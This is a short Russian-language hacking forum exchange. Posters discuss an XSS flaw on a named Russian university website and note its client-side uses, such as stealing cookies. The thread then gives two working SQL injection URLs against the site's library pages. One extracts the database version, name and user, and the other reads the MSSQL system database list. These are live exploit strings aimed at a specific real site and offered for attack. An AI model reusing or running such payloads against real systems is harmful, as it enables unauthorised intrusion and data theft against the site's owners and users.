![]() |
|
Я бы помог. Но мало того, что это .ru, это еще и гос сайт. с ' очевидно что скуля. А с хсской куча векторов но все они клиентские. От угона куков до хека тачки
|
[QUOTE="qwebdev"]
↑ Нашел на сайте http://abc.vvsu.ru/ xss-уязвимость, при вводе ">alert('xss')"alert('xss')" |
Код:
http://lib.vvsu.ru/russian/index.php?id=61&id_exhibition=156+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6+--+Код:
http://lib.vvsu.ru//admin/news.asp?idyear=999999.9+union+all+select+null,null,null,(select+char(126)%2bchar(39)%2bname%2bchar(39)%2bchar(126)+from+master..sysdatabases+where+dbid=1),null,null,null,null-- |
Цитата:
|
Цитата:
|
| Время: 20:47 |